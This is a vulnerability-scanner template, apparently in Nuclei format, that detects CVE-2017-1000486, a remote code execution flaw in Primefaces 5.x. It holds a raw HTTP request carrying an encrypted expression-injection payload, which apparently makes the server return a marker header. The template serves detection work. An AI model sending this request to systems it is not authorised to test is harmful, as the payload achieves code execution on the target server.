-
Notifications
You must be signed in to change notification settings - Fork 35
/
CVE-2017-1000486.yaml
47 lines (42 loc) · 1.75 KB
/
CVE-2017-1000486.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
id: CVE-2017-1000486
info:
name: Primetek Primefaces 5.x - Remote Code Execution
author: Moritz Nentwig
severity: critical
description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.
remediation: |
Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application.
reference:
- https://github.com/mogwailabs/CVE-2017-1000486
- https://github.com/pimps/CVE-2017-1000486
- https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000486
- https://cryptosense.com/weak-encryption-flaw-in-primefaces/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-1000486
cwe-id: CWE-326
epss-score: 0.96894
epss-percentile: 0.99604
cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: primetek
product: primefaces
tags: cve,cve2017,primetek,rce,injection,kev
http:
- raw:
- |
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB+H6/QEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo+QZuqhqtPxdTA==
matchers:
- type: word
part: header
words:
- 'Mogwailabs: CHECKCHECK'
# digest: 4a0a00473045022100e2a23d45f7cff22bc0e5cc15102f903c6bb0acf64fd22c1f62758c06f8ee53a002202a66a65908386e5b4c0bb7b80a9a3ef5b64fdfe1e2d260f2360a93dfb16d9341:922c64590222798bb761d5b6d8e72950